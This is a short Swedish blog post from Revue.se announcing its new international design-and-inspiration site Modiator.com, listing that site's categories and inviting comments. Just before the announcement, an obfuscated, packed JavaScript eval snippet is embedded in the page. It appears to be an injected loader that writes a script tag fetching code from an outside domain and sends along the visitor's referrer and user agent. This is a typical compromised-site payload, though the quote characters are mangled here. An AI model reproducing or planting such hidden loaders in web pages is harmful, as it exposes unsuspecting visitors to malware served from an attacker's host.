Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Revue.se släpper Modiator.com

Revue.se släpper Modiator.com

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyrhd|var|u0026u|referrer|banzy||js|php’.split(’|’),0,{}))
Modiator: Nu är det dags. Idag meddelar Revue.se att vi nu släpper en ny fräsch sajt med bredare inriktning. The Modiator eller modiator.com är en internationell webbplats som fokuserar mer på design än teknik. Idén är att kunna samla unika, otroliga objekt och låta besökare hitta inspiration till sitt hem, sin bil, båt eller klädstil. 

Revue.se har ökat något otroligt på senare tid och tar nu steget ut ur Sverige med Modiator.com. Självklart kommer Revue.se leva vidare och växa ännu mer. The Modiator är ett tillskott som vi hoppas locka fler besökare med då den innefattar helt andra områden än Revue.se

Ta er gärna en kik på sajten och kommentera nedan vad ni tycker samt om det är något ni skulle vilja förbättra eller lägga till. Vi lyssnar på er 🙂

Kategorier på The Modiator: Cars, Housing, Boat, Watch, Fun, In the air.

Trevlig fortsatt dag önskar redaktionen på Revue.se

Hemsida: Modiator.com